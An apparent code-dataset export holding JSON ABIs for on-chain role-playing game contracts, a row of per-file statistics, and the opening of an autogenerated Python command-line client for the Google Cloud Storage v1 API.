","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"level","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"level_up","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"next_summoner","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"},{"internalType":"uint256","name":"_xp","type":"uint256"}],"name":"spend_xp","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_class","type":"uint256"}],"name":"summon","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"summoner","outputs":[{"internalType":"uint256","name":"_xp","type":"uint256"},{"internalType":"uint256","name":"_log","type":"uint256"},{"internalType":"uint256","name":"_class","type":"uint256"},{"internalType":"uint256","name":"_level","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"xp","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"curent_level","type":"uint256"}],"name":"xp_required","outputs":[{"internalType":"uint256","name":"xp_to_next_level","type":"uint256"}],"stateMutability":"pure","type":"function"}]""")
cellar_abi = json.loads("""[{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"from","type":"uint256"},{"indexed":true,"internalType":"uint256","name":"to","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"from","type":"uint256"},{"indexed":true,"internalType":"uint256","name":"to","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"adventure","outputs":[{"internalType":"uint256","name":"reward","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"adventurers_log","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"},{"internalType":"uint256","name":"","type":"uint256"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"from","type":"uint256"},{"internalType":"uint256","name":"spender","type":"uint256"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_dex","type":"uint256"}],"name":"armor_class","outputs":[{"internalType":"int256","name":"","type":"int256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"_class","type":"uint256"},{"internalType":"uint256","name":"_str","type":"uint256"},{"internalType":"uint256","name":"_level","type":"uint256"}],"name":"attack_bonus","outputs":[{"internalType":"int256","name":"","type":"int256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_class","type":"uint256"}],"name":"base_attack_bonus_by_class","outputs":[{"internalType":"uint256","name":"attack","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"_class","type":"uint256"},{"internalType":"uint256","name":"_level","type":"uint256"}],"name":"base_attack_bonus_by_class_and_level","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"_str","type":"uint256"}],"name":"damage","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"dungeon_armor_class","outputs":[{"internalType":"int256","name":"","type":"int256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"dungeon_damage","outputs":[{"internalType":"int256","name":"","type":"int256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"dungeon_health","outputs":[{"internalType":"int256","name":"","type":"int256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"dungeon_to_hit","outputs":[{"internalType":"int256","name":"","type":"int256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_class","type":"uint256"}],"name":"health_by_class","outputs":[{"internalType":"uint256","name":"health","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"_class","type":"uint256"},{"internalType":"uint256","name":"_level","type":"uint256"},{"internalType":"uint32","name":"_const","type":"uint32"}],"name":"health_by_class_and_level","outputs":[{"internalType":"uint256","name":"health","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"_attribute","type":"uint256"}],"name":"modifier_for_attribute","outputs":[{"internalType":"int256","name":"_modifier","type":"int256"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"scout","outputs":[{"internalType":"uint256","name":"reward","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"int256","name":"_attack_bonus","type":"int256"}],"name":"to_hit_ac","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"from","type":"uint256"},{"internalType":"uint256","name":"to","type":"uint256"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"executor","type":"uint256"},{"internalType":"uint256","name":"from","type":"uint256"},{"internalType":"uint256","name":"to","type":"uint256"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]""")
attr_abi = json.loads("""[{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"creator","type":"address"},{"indexed":false,"internalType":"uint256","name":"summoner","type":"uint256"},{"indexed":false,"internalType":"uint32","name":"strength","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"dexterity","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"constitution","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"intelligence","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"wisdom","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"charisma","type":"uint32"}],"name":"Created","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"leveler","type":"address"},{"indexed":false,"internalType":"uint256","name":"summoner","type":"uint256"},{"indexed":false,"internalType":"uint32","name":"strength","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"dexterity","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"constitution","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"intelligence","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"wisdom","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"charisma","type":"uint32"}],"name":"Leveled","type":"event"},{"inputs":[{"internalType":"uint256","name":"current_level","type":"uint256"}],"name":"abilities_by_level","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"ability_scores","outputs":[{"internalType":"uint32","name":"strength","type":"uint32"},{"internalType":"uint32","name":"dexterity","type":"uint32"},{"internalType":"uint32","name":"constitution","type":"uint32"},{"internalType":"uint32","name":"intelligence","type":"uint32"},{"internalType":"uint32","name":"wisdom","type":"uint32"},{"internalType":"uint32","name":"charisma","type":"uint32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"score","type":"uint256"}],"name":"calc","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"_str","type":"uint256"},{"internalType":"uint256","name":"_dex","type":"uint256"},{"internalType":"uint256","name":"_const","type":"uint256"},{"internalType":"uint256","name":"_int","type":"uint256"},{"internalType":"uint256","name":"_wis","type":"uint256"},{"internalType":"uint256","name":"_cha","type":"uint256"}],"name":"calculate_point_buy","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"character_created","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"increase_charisma","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"increase_constitution","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"increase_dexterity","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"increase_intelligence","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"increase_strength","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"increase_wisdom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"level_points_spent","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"},{"internalType":"uint32","name":"_str","type":"uint32"},{"internalType":"uint32","name":"_dex","type":"uint32"},{"internalType":"uint32","name":"_const","type":"uint32"},{"internalType":"uint32","name":"_int","type":"uint32"},{"internalType":"uint32","name":"_wis","type":"uint32"},{"internalType":"uint32","name":"_cha","type":"uint32"}],"name":"point_buy","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"}]""")
| 3,475.666667
| 6,532
| 0.660737
| 2,068
| 20,854
| 6.609768
| 0.059478
| 0.158534
| 0.227156
| 0.125101
| 0.940669
| 0.912283
| 0.855512
| 0.838613
| 0.822738
| 0.805106
| 0
| 0.046161
| 0.000671
| 20,854
| 6
| 6,533
| 3,475.666667
| 0.609741
| 0
| 0
| 0
| 0
| 0.8
| 0.993623
| 0.993623
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
684db5f76eab70d232cc307e0b995a49cd636d1a
| 167
|
py
|
Python
|
camps/__init__.py
|
AdamSchnapp/mycamps
|
c5c158fdcdc41890c06598bf7c2329b1b981f259
|
[
"MIT"
] | null | null | null |
camps/__init__.py
|
AdamSchnapp/mycamps
|
c5c158fdcdc41890c06598bf7c2329b1b981f259
|
[
"MIT"
] | null | null | null |
camps/__init__.py
|
AdamSchnapp/mycamps
|
c5c158fdcdc41890c06598bf7c2329b1b981f259
|
[
"MIT"
] | null | null | null |
#from .variables import Variable
from .steps import MultiStep
from .variables import Variable
from .sfctbl import read_sfctbl
import camps.core
import camps.stations
| 20.875
| 32
| 0.832335
| 23
| 167
| 6
| 0.478261
| 0.188406
| 0.275362
| 0.391304
| 0.449275
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125749
| 167
| 7
| 33
| 23.857143
| 0.945205
| 0.185629
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
685146ad3e081058e765cae883a2f262eb9e5688
| 136
|
py
|
Python
|
readability_baseline/evaluation/loss.py
|
SharvilN/Common-Readability-Prize
|
c92f8b3456610a092027fb1a287541cbecab410b
|
[
"MIT"
] | null | null | null |
readability_baseline/evaluation/loss.py
|
SharvilN/Common-Readability-Prize
|
c92f8b3456610a092027fb1a287541cbecab410b
|
[
"MIT"
] | null | null | null |
readability_baseline/evaluation/loss.py
|
SharvilN/Common-Readability-Prize
|
c92f8b3456610a092027fb1a287541cbecab410b
|
[
"MIT"
] | null | null | null |
import numpy as np
from sklearn import metrics
def rmse(targets, preds):
return np.sqrt(metrics.mean_squared_error(targets, preds))
| 27.2
| 62
| 0.786765
| 21
| 136
| 5
| 0.761905
| 0.228571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132353
| 136
| 5
| 62
| 27.2
| 0.889831
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
689678a5e2a4928b1c314274dfea106c5d922f0e
| 243
|
py
|
Python
|
gym_promotions/envs/__init__.py
|
kimfalk/gym-promotions
|
0d8ca25e91ef7fc2039b00daffa94241696604a0
|
[
"MIT"
] | null | null | null |
gym_promotions/envs/__init__.py
|
kimfalk/gym-promotions
|
0d8ca25e91ef7fc2039b00daffa94241696604a0
|
[
"MIT"
] | null | null | null |
gym_promotions/envs/__init__.py
|
kimfalk/gym-promotions
|
0d8ca25e91ef7fc2039b00daffa94241696604a0
|
[
"MIT"
] | null | null | null |
from gym_promotions.envs.promotions_env import PromotionsEnv
from gym_promotions.envs.promotions_probabilistic_env import PromotionsProbabilisticEnv
from gym_promotions.envs.promotions_from_space_env import PromotionsProbabilisticFromSpaceEnv
| 60.75
| 93
| 0.925926
| 27
| 243
| 8
| 0.407407
| 0.097222
| 0.236111
| 0.291667
| 0.430556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.049383
| 243
| 3
| 94
| 81
| 0.935065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d7b6c1519e12fe4c540fbece0e2fa81a8ad29375
| 7,008
|
py
|
Python
|
RN-Nets_for_vertex_classification/utils/layers.py
|
yeweiysh/RN-Nets
|
4afa180e6a745291f08790b923ae4ef308616c6f
|
[
"MIT"
] | null | null | null |
RN-Nets_for_vertex_classification/utils/layers.py
|
yeweiysh/RN-Nets
|
4afa180e6a745291f08790b923ae4ef308616c6f
|
[
"MIT"
] | null | null | null |
RN-Nets_for_vertex_classification/utils/layers.py
|
yeweiysh/RN-Nets
|
4afa180e6a745291f08790b923ae4ef308616c6f
|
[
"MIT"
] | null | null | null |
import numpy as np
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import sys
conv1d = tf.layers.conv1d
def RNNETS_MLP(inputs, output_dim, norm_mat, activation, in_drop=0.0):
with tf.name_scope('my_attn'):
if in_drop != 0.0:
inputs = tf.nn.dropout(inputs, 1.0 - in_drop)
inputs = tf.expand_dims(inputs, axis=0)
seq_fts = tf.layers.conv1d(inputs, output_dim, 1, use_bias=False)
if in_drop != 0.0:
seq_fts = tf.nn.dropout(seq_fts, 1.0 - in_drop)
hops = 20
seq_fts = tf.squeeze(seq_fts, axis=0)
n, m = seq_fts.get_shape()
n = int(n)
H1 = tf.sparse_tensor_dense_matmul(norm_mat, seq_fts)
subspace = list()
subspace.append(H1)
for i in range(hops-1):
Hi = tf.sparse_tensor_dense_matmul(norm_mat, subspace[i])
subspace.append(Hi)
#aggregation
H = tf.stack(subspace, axis=0)
H = tf.reshape(H, [hops, n*output_dim])
H = tf.transpose(H)
H = tf.expand_dims(H, axis=0)
H = tf.layers.conv1d(H, 32, 1, use_bias=False, activation="relu")
H = tf.layers.conv1d(H, 1, 1, use_bias=False)
H = tf.transpose(H)
vals = tf.reshape(H, [1, n, output_dim])
#ret = tf.contrib.layers.bias_add(vals)
bias = tf.get_variable(shape=[output_dim,],initializer=tf.initializers.zeros,name="bias0")
ret = tf.nn.bias_add(vals,bias)
return activation(ret) # activation
def RNNETS_GRU(inputs, output_dim, norm_mat, activation, in_drop=0.0):
with tf.name_scope('my_attn'):
if in_drop != 0.0:
inputs = tf.nn.dropout(inputs, 1.0 - in_drop)
inputs = tf.expand_dims(inputs, axis=0)
seq_fts = tf.layers.conv1d(inputs, output_dim, 1, use_bias=False)
if in_drop != 0.0:
seq_fts = tf.nn.dropout(seq_fts, 1.0 - in_drop)
hops = 20
hidden = 32
seq_fts = tf.squeeze(seq_fts, axis=0)
n, m = seq_fts.get_shape()
n = int(n)
H1 = tf.sparse_tensor_dense_matmul(norm_mat, seq_fts)
subspace = list()
subspace.append(H1)
for i in range(hops-1):
Hi = tf.sparse_tensor_dense_matmul(norm_mat, subspace[i])
subspace.append(Hi)
#aggregation
H = tf.stack(subspace, axis=0)
H = tf.reshape(H, [hops, n*output_dim])
H = tf.transpose(H)
H = tf.reshape(H, [n, output_dim, hops])
rnn_hidden_size = hidden
cell = tf.nn.rnn_cell.GRUCell(num_units=rnn_hidden_size)
outputs, last_states = tf.nn.dynamic_rnn(cell, H, dtype=tf.float32)
vals = tf.reduce_max(outputs, axis=-1)
vals = tf.expand_dims(vals, axis=0)
#ret = tf.contrib.layers.bias_add(vals)
bias = tf.get_variable(shape=[output_dim,],initializer=tf.initializers.zeros,name="bias")
ret = tf.nn.bias_add(vals,bias)
return activation(ret) # activation
def RNNETS_HK(inputs, output_dim, norm_mat, activation, in_drop=0.0):
with tf.name_scope('my_attn'):
if in_drop != 0.0:
inputs = tf.nn.dropout(inputs, 1.0 - in_drop)
inputs = tf.expand_dims(inputs, axis=0)
seq_fts = tf.layers.conv1d(inputs, output_dim, 1, use_bias=False)
if in_drop != 0.0:
seq_fts = tf.nn.dropout(seq_fts, 1.0 - in_drop)
hops = 2
seq_fts = tf.squeeze(seq_fts, axis=0)
n, m = seq_fts.get_shape()
n = int(n)
H1 = tf.sparse_tensor_dense_matmul(norm_mat, seq_fts)
subspace = list()
subspace.append(H1)
for i in range(hops-1):
Hi = tf.sparse_tensor_dense_matmul(norm_mat, subspace[i])
subspace.append(Hi)
t = 5
t = tf.convert_to_tensor(t, dtype=tf.float32)
t1 = -5
t1 = tf.convert_to_tensor(t1, dtype=tf.float32)
weights = list()
for i in range(hops):
i1 = tf.convert_to_tensor(i, dtype=tf.float32)
i2 = tf.convert_to_tensor(i + 1, dtype=tf.float32)
temp1 = tf.math.pow(t, i1)
temp2 = tf.math.exp(tf.math.lgamma(i2))
temp3 = tf.math.divide(temp1, temp2)
temp4 = tf.math.exp(t1)
weights.append(tf.math.multiply(temp3, temp4))
W = tf.stack(weights, axis=0)
W = tf.expand_dims(W, axis=0)
#aggregation
H = tf.stack(subspace, axis=0)
H = tf.reshape(H, [hops, n*output_dim])
support = tf.matmul(W, H)
vals = tf.reshape(support, [1, n, output_dim])
#ret = tf.contrib.layers.bias_add(vals)
bias = tf.get_variable(shape=[output_dim,],initializer=tf.initializers.zeros,name="bias")
ret = tf.nn.bias_add(vals,bias)
return activation(ret) # activation
def RNNETS_PR(inputs, output_dim, norm_mat, activation, in_drop=0.0):
with tf.name_scope('my_attn'):
if in_drop != 0.0:
inputs = tf.nn.dropout(inputs, 1.0 - in_drop)
inputs = tf.expand_dims(inputs, axis=0)
seq_fts = tf.layers.conv1d(inputs, output_dim, 1, use_bias=False)
if in_drop != 0.0:
seq_fts = tf.nn.dropout(seq_fts, 1.0 - in_drop)
hops = 2
seq_fts = tf.squeeze(seq_fts, axis=0)
n, m = seq_fts.get_shape()
n = int(n)
H1 = tf.sparse_tensor_dense_matmul(norm_mat, seq_fts)
subspace = list()
subspace.append(H1)
for i in range(hops-1):
Hi = tf.sparse_tensor_dense_matmul(norm_mat, subspace[i])
subspace.append(Hi)
alpha = 0.8
beta = 1 - alpha
alpha = tf.convert_to_tensor(alpha, dtype=tf.float32)
beta = tf.convert_to_tensor(beta, dtype=tf.float32)
weights = list()
for i in range(hops):
i1 = tf.convert_to_tensor(i, dtype=tf.float32)
temp1 = tf.math.pow(alpha, i1)
weights.append(tf.math.multiply(beta, temp1))
#print(weights[-1])
W = tf.stack(weights, axis=0)
W = tf.expand_dims(W, axis=0)
#aggregation
H = tf.stack(subspace, axis=0)
H = tf.reshape(H, [hops, n*output_dim])
support = tf.matmul(W, H)
vals = tf.reshape(support, [1, n, output_dim])
#ret = tf.contrib.layers.bias_add(vals)
bias = tf.get_variable(shape=[output_dim,],initializer=tf.initializers.zeros,name="bias")
ret = tf.nn.bias_add(vals,bias)
return activation(ret) # activation
def linear_layer(inputs, output_dim, activation, in_drop=0.0):
with tf.name_scope('my_attn'):
if in_drop != 0.0:
inputs = tf.nn.dropout(inputs, 1.0 - in_drop)
seq_fts = tf.layers.conv1d(inputs, output_dim, 1, use_bias=False)
if in_drop != 0.0:
seq_fts = tf.nn.dropout(seq_fts, 1.0 - in_drop)
vals = seq_fts
ret = tf.contrib.layers.bias_add(vals)
return activation(ret) # activation
| 33.5311
| 98
| 0.588756
| 1,049
| 7,008
| 3.755005
| 0.119161
| 0.048743
| 0.026657
| 0.030465
| 0.81772
| 0.791318
| 0.791318
| 0.773293
| 0.773293
| 0.773293
| 0
| 0.03125
| 0.283105
| 7,008
| 208
| 99
| 33.692308
| 0.752787
| 0.038385
| 0
| 0.735099
| 0
| 0
| 0.008328
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033113
| false
| 0
| 0.019868
| 0
| 0.086093
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d7cff48a0a7c98ecf998515d21d619fc69fe111d
| 143,275
|
py
|
Python
|
third_party/gsutil/third_party/apitools/samples/storage_sample/storage_v1/storage_v1.py
|
tingshao/catapult
|
a8fe19e0c492472a8ed5710be9077e24cc517c5c
|
[
"BSD-3-Clause"
] | 2,151
|
2020-04-18T07:31:17.000Z
|
2022-03-31T08:39:18.000Z
|
third_party/gsutil/third_party/apitools/samples/storage_sample/storage_v1/storage_v1.py
|
tingshao/catapult
|
a8fe19e0c492472a8ed5710be9077e24cc517c5c
|
[
"BSD-3-Clause"
] | 395
|
2020-04-18T08:22:18.000Z
|
2021-12-08T13:04:49.000Z
|
third_party/gsutil/third_party/apitools/samples/storage_sample/storage_v1/storage_v1.py
|
tingshao/catapult
|
a8fe19e0c492472a8ed5710be9077e24cc517c5c
|
[
"BSD-3-Clause"
] | 338
|
2020-04-18T08:03:10.000Z
|
2022-03-29T12:33:22.000Z
|
#!/usr/bin/env python
"""CLI for storage, version v1."""
# NOTE: This file is autogenerated and should not be edited by hand.
import code
import os
import platform
import sys
from apitools.base.protorpclite import message_types
from apitools.base.protorpclite import messages
from google.apputils import appcommands
import gflags as flags
import apitools.base.py as apitools_base
from apitools.base.py import cli as apitools_base_cli
import storage_v1_client as client_lib
import storage_v1_messages as messages
def _DeclareStorageFlags():
"""Declare global flags in an idempotent way."""
if 'api_endpoint' in flags.FLAGS:
return
flags.DEFINE_string(
'api_endpoint',
u'https://www.googleapis.com/storage/v1/',
'URL of the API endpoint to use.',
short_name='storage_url')
flags.DEFINE_string(
'history_file',
u'~/.storage.v1.history',
'File with interactive shell history.')
flags.DEFINE_multistring(
'add_header', [],
'Additional http headers (as key=value strings). '
'Can be specified multiple times.')
flags.DEFINE_string(
'service_account_json_keyfile', '',
'Filename for a JSON service account key downloaded'
' from the Developer Console.')
flags.DEFINE_enum(
'alt',
u'json',
[u'json'],
u'Data format for the response.')
flags.DEFINE_string(
'fields',
None,
u'Selector specifying which fields to include in a partial response.')
flags.DEFINE_string(
'key',
None,
u'API key. Your API key identifies your project and provides you with '
u'API access, quota, and reports. Required unless you provide an OAuth '
u'2.0 token.')
flags.DEFINE_string(
'oauth_token',
None,
u'OAuth 2.0 token for the current user.')
flags.DEFINE_boolean(
'prettyPrint',
'True',
u'Returns response with indentations and line breaks.')
flags.DEFINE_string(
'quotaUser',
None,
u'Available to use for quota purposes for server-side applications. Can'
u' be any arbitrary string assigned to a user, but should not exceed 40'
u' characters. Overrides userIp if both are provided.')
flags.DEFINE_string(
'trace',
None,
'A tracing token of the form "token:<tokenid>" to include in api '
'requests.')
flags.DEFINE_string(
'userIp',
None,
u'IP address of the site where the request originates. Use this if you '
u'want to enforce per-user limits.')
FLAGS = flags.FLAGS
apitools_base_cli.DeclareBaseFlags()
_DeclareStorageFlags()
def GetGlobalParamsFromFlags():
"""Return a StandardQueryParameters based on flags."""
result = messages.StandardQueryParameters()
if FLAGS['alt'].present:
result.alt = messages.StandardQueryParameters.AltValueValuesEnum(FLAGS.alt)
if FLAGS['fields'].present:
result.fields = FLAGS.fields.decode('utf8')
if FLAGS['key'].present:
result.key = FLAGS.key.decode('utf8')
if FLAGS['oauth_token'].present:
result.oauth_token = FLAGS.oauth_token.decode('utf8')
if FLAGS['prettyPrint'].present:
result.prettyPrint = FLAGS.prettyPrint
if FLAGS['quotaUser'].present:
result.quotaUser = FLAGS.quotaUser.decode('utf8')
if FLAGS['trace'].present:
result.trace = FLAGS.trace.decode('utf8')
if FLAGS['userIp'].present:
result.userIp = FLAGS.userIp.decode('utf8')
return result
def GetClientFromFlags():
"""Return a client object, configured from flags."""
log_request = FLAGS.log_request or FLAGS.log_request_response
log_response = FLAGS.log_response or FLAGS.log_request_response
api_endpoint = apitools_base.NormalizeApiEndpoint(FLAGS.api_endpoint)
additional_http_headers = dict(x.split('=', 1) for x in FLAGS.add_header)
credentials_args = {
'service_account_json_keyfile': os.path.expanduser(FLAGS.service_account_json_keyfile)
}
try:
client = client_lib.StorageV1(
api_endpoint, log_request=log_request,
log_response=log_response,
credentials_args=credentials_args,
additional_http_headers=additional_http_headers)
except apitools_base.CredentialsError as e:
print 'Error creating credentials: %s' % e
sys.exit(1)
return client
class PyShell(appcommands.Cmd):
def Run(self, _):
"""Run an interactive python shell with the client."""
client = GetClientFromFlags()
